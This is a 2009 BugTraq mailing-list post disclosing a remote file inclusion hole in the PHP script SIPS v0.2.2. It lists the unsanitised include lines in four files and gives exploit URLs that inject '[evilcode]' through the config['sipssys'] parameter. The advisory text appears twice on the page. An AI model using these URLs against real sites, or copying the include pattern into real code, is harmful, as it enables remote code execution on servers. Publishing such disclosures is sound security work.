BugTraq
Back to list
|
Post reply
SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 03:20PM
Cru3l.b0y (cru3l b0y gmail com)
(2 replies)
Hi Dear,
Please publish this bug.
Thank you
/=======================================================================
========================================================================
| |
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability |
| |
| Software : SIPS v0.2.2 |
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |
| Author : Cru3l.b0y | |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| search.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| readmore.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| index.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| include $config["sipssys"] ."/code/box.inc.php"; |
| |
| search/submit.php |
| |
| include $config["sipssys"] ."/code/search.inc.php"; |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode] |
| |
[ reply ]
Re: SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 07:38PM
Joe (joe avvanta com)
Re: SIPS v0.2.2 Remote File Inclusion Vulnerability
Jun 30 2009 06:29PM
Vladimir '3APA3A' Dubrovin (3APA3A SECURITY NNOV RU)
Privacy Statement
Copyright 2010, SecurityFocus
Please publish this bug.
Thank you
/=======================================================================
========================================================================
| |
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability |
| |
| Software : SIPS v0.2.2 |
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |
| Author : Cru3l.b0y | |
| Home : WwW.DeltaHacking.Net
|=======================================================================
========================================================================
|
| |
| [o] Vulnerable file |
| |
| search.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| readmore.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| |
| index.php |
| |
| include $config["sipssys"] ."/code/news.inc.php"; |
| include $config["sipssys"] ."/code/box.inc.php"; |
| |
| search/submit.php |
| |
| include $config["sipssys"] ."/code/search.inc.php"; |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode] |
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode] |
| |
[ reply ]